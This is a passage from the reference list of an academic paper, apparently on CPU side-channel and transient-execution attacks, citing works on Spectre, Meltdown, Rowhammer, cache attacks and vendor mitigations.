Security Symposium ({USENIX} Security 15), pp. 897–912. [12] Heise (2018): CPU-Sicherheitslücken Spectre-NG: Updates und Info-Links. Available at https:// www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-und-Info-Links-4053268. html. [13] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai & O. Mutlu (2014): Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors. In: 2014 ACM/IEEE 41st International Symposium on Computer Architecture (ISCA), pp. 361–372. [14] Olaf Kirch (2018): Meltdown and Spectre Performance. Available at https://www.suse.com/c/ meltdown-spectre-performance/. [15] Paul Kocher, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Man- gard, Thomas Prescher, Michael Schwarz & Yuval Yarom: Spectre Attacks: Exploiting Speculative Execution. [16] Paul C Kocher (1996): Timing attacks on implementations of Die-Hellman, RSA, DSS, and other systems. In: Advances in Cryptology| Crypto, 96, p. 104113. [17] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom & Mike Hamburg: Meltdown. [18] F. Liu, Y. Yarom, Q. Ge, G. Heiser & R. B. Lee (2015): Last-Level Cache Side-Channel Attacks are Practical. In: 2015 IEEE Symposium on Security and Privacy, pp. 605–622, doi:10.1109/SP.2015.43. [19] Microsoft: Mitigating speculative execution side-channel attacks in Microsoft Edge and Internet Explorer. Available at https://blogs.windows.com/msedgedev/2018/01/03/ speculative-execution-mitigations-microsoft-edge-internet-explorer/.

21 [20] Mozilla: Mitigations landing for new class of timing attack. Available at https://blog.mozilla. org/security/2018/01/03/mitigations-landing-new-class-timing-attack/. [21] Dag Arne Osvik, Adi Shamir & Eran Tromer (2006): Cache Attacks and Countermeasures: The Case of AES. In David Pointcheval, editor: Topics in Cryptology – CT-RSA 2006, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 1–20. [22] James L. Fenton Paul A. Grassi, Michael E. Garcia (2017): NIST Special Publication 800-63-3, Digital Identity Guidelines. National Institute of Standards and Technology, doi:https://doi.org/10.6028/NIST.SP.800-63-3. [23] Michael Schwarz, Moritz Lipp, Claudio Canella, Robert Schilling, Florian Kargl & Daniel Gruss (2020): Context: A generic approach for mitigating spectre. In: Proceedings of the 27th Annual Network and Distributed System Security Symposium (NDSS20). Internet Society, Reston, VA. [24] Michael Schwarz, Martin Schwarzl, Moritz Lipp, Jon Masters & Daniel Gruss (2019): Netspectre: Read arbitrary memory over network. In: European Symposium on Research in Computer Security, Springer, pp. 279–299. [25] François-Xavier Standaert (2010): Introduction to side-channel attacks. In: Secure integrated circuits and systems, Springer, pp. 27–42. [26] Yukiyasu Tsunoo, Teruo Saito, Tomoyasu Suzaki, Maki Shigeri & Hiroshi Miyauchi (2003): Crypt- analysis of DES Implemented on Computers with Cache. In Colin D. Walter, Çetin K. Koç & Christof Paar, editors: Cryptographic Hardware and Embedded Systems - CHES 2003, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 62–76. [27] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Thomas F Wenisch, Yuval Yarom & Raoul Strackx (2018): Foreshadow: Extracting the keys to the intel {SGX} kingdom with transient out-of-order execution. In: 27th {USENIX} Security Symposium ({USENIX} Security 18), pp. 991–1008. [28] Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lippi, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss & Frank Piessens (2020): LVI: Hijacking transient execution through microarchitectural load value injection. In: 2020 IEEE Symposium on Security and Privacy (SP), IEEE, pp. 54–72. [29] Yuval Yarom & Katrina Falkner (2014): FLUSH+ RELOAD: a high resolution, low noise, L3 cache side-channel attack. In: 23rd {USENIX} Security Symposium ({USENIX} Security 14), pp. 719–732.

22